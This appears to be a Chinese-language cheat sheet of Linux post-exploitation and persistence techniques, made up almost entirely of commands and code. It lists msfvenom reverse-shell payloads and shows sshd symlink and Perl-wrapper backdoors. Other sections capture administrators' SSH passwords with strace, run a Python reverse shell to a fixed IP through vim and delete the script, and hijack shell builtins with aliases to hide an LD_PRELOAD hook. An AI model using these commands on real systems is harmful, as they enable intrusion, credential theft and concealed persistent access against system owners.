msfvenom -l payloads | grep 'cmd/unix/reverse'

    cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
    cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
    cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
    cmd/unix/reverse_bash_udp                           Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature.
    cmd/unix/reverse_jjs                                Connect back and create a command shell via jjs
    cmd/unix/reverse_ksh                                Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.
    cmd/unix/reverse_lua                                Creates an interactive shell via Lua
    cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
    cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
    cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
    cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
    cmd/unix/reverse_perl                               Creates an interactive shell via perl
    cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
    cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
    cmd/unix/reverse_python                             Connect back and create a command shell via Python
    cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
    cmd/unix/reverse_r                                  Connect back and create a command shell via R
    cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
    cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
    cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
    cmd/unix/reverse_ssh                                Connect back and create a command shell via SSH
    cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
    cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
    cmd/unix/reverse_tclsh                              Creates an interactive shell via Tclsh
    cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default

msfvenom -p <payload> LHOST=<LHOST> LPORT=<LPORT> -f <format> -o <path>

msfvenom -p <payload> -e <encoder > -i <encoder times> LHOST=<LHOST> LPORT=<LPORT> -f <format> -o <path>

1) sudo find / -name 'cron*' | egrep -v 'man|doc' | sort -u

2) sudo updatedb && sudo locate cron | egrep -v 'doc|man'

1) 用户允许/禁止配置文件

- /etc/cron.deny ：用来禁止一些用户使用cron服务的配置文件

- /etc/cron.allow ：允许一些用户来使用cron服务的配置文件，优先级高

2) 系统配置项：系统执行的计划任务

- /etc/crontab 

- /etc/cron.d/

3) 用户配置项：执行crontab命令操作的目录

- /var/spool/cron

4) 其他计划任务文件

    /etc/cron.daily
    /etc/cron.deny
    /etc/cron.hourly
    /etc/cron.monthly
    /etc/cron.weekly

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=6666;

ssh [email protected] -p 6666

cd /usr/sbin/
mv sshd ../bin
vim sshd //编辑sshd内容为以下

#!/usr/bin/perl
exec"/bin/sh" if(getpeername(STDIN)=~/^..0V/); // \x00\x000V是22222的大端形式
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

重启sshd
service sshd restart

本机执行
socat STDIO TCP4:127.0.0.1:22,sourceport=22222

修改源端口
import struct
buffer = struct.pack('>I',22222)
print(buffer)

# 利用strace工具获取ssh的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码
alias ssh='strace -o /tmp/.sshpwd-`date '+%d%h%m%s'`.log -e read.write.connect -s 2048 ssh'

grep "read(5" /tmp/.sshpwdxxxxxxxx.log

// 适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统,恶意脚本.py的内容可以是任何功能的后门

cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile json.py"> /dev/null 2>&1 &) && sleep 2 && rm -f json.py

// 脚本代码

import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect(("192.168.121.1", 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);

//  攻击机监听6666端口并获取反弹的shell

nc -lvnp 6666

1) echo $LD_PRELOAD 

alias echo='func(){ echo $* | sed "s!/home/hook.so! !g";};func'

2) env

alias env='func(){ env $* | grep -v "/home/hook.so";};func'

3) set 

alias set='func(){ set $* | grep -v "/home/hook.so";};func'

4) export 

alias export='func(){ export $* | grep -v "/home/hook.so";};func'

5) unalias劫持

alias unalias='func(){ if [ $# != 0 ]; then if [ $* != "echo" ]&&[ $* != "env" ]&&[ $* != "set" ]&&[ $* != "export" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};func'

6) alias劫持

alias alias='func(){ alias "$@" | grep -v unalias | grep -v hook.so;};func'